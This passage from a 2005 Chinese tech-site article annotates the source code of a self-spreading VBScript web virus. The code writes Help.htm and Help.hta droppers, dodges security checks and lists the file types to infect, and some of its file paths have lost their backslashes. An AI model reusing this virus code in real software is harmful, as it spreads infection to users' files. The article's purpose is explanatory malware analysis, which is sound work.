揭密:各种各样网页病毒源码解析--中华网--科技频道

新闻 | 军事 | 论坛 | 汽车 | 科　技 | 游戏 | 娱乐 | 女人 | 时尚 | 留学 | 旅游 | 购车 | 食品 | 文化 | ３Ｇ | 教育 | 音乐 | 邮箱 | 公益 | 求医
财经 | 军史 | 博客 | 搜车 | 实拍 | 网游 | 明星 | 城市 | 篮球 | 数码 | 智游 | 亲子 | 社会 | 文史 | 健康 | 图库 | 电影 | 问答 | 评论 | 时尚

揭密:各种各样网页病毒源码解析(1)

中华网科技 http://tech.china.com 2005-07-27 13:46:04

【进入BBS】【进入聊天室】【推荐给朋友】【浏览字号：大中小】【关闭窗口】

　　Rem I am sorry! happy time
　　On Error Resume Next
　　Mload
　　’以上为病毒入口，并加上I am sorry! happy time的注释，以表明此文件已被感染过。

　　Sub mload()
　　On Error Resume Next
　　mPath = Grf()
　　Set Os = CreateObject("Scriptlet.TypeLib")
　　Set Oh = CreateObject("Shell.Application")
　　’建立枚举对象，避开了安全审核

　　If IsHTML Then
　　’调用IsHtml函数，如果是Html，就小写……

　　mURL = LCase(document.Location)
　　If mPath = "" Then
　　Os.Reset
　　Os.Path = "C:Help.htm"
　　Os.Doc = Lhtml()
　　Os.Write()
　　’如果mPath为空，就在C盘下生成Help.htm

　　Ihtml = ""
　　’超文本的内容，并指向C:Help.Htm

　　Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
　　Else
　　If Iv(mPath, "Help.vbs") Then
　　setInterval "Rt()", 10000
　　Else
　　m = "hta"
　　If LCase(m) = Right(mURL, Len(m)) Then
　　id = setTimeout("mclose()", 1)
　　’设置超时条件

　　main
　　Else
　　Os.Reset()
　　Os.Path = mPath & "" & "Help.hta"
　　Os.Doc = Lhtml()
　　Os.write()
　　Iv mPath, "Help.hta"
　　’生成Help.hta

　　End If
　　End If
　　End If
　　Else
　　Main
　　’都不是，就执行main函数

　　End If
　　End Sub
　　主函数

　　Sub main()
　　On Error Resume Next
　　Set Of = CreateObject("Scripting.FileSystemObject")
　　’不用说，创建FileSystemObject对象啦

　　Set Od = CreateObject("Scripting.Dictionary")
　　’创建Dictionary对象, 用来保存数据键和项目对，它实际上是一个比较开放的数组

　　Od.Add "html", "1100"
　　Od.Add "vbs", "0100"
　　Od.Add "htm", "1100"
　　Od.Add "asp", "0010"
　　’向Dictionary对象添加要感染的项目对

　　Ks = "HKEY_CURRENT_USERSoftware"
　　’使用变量以减少代码长度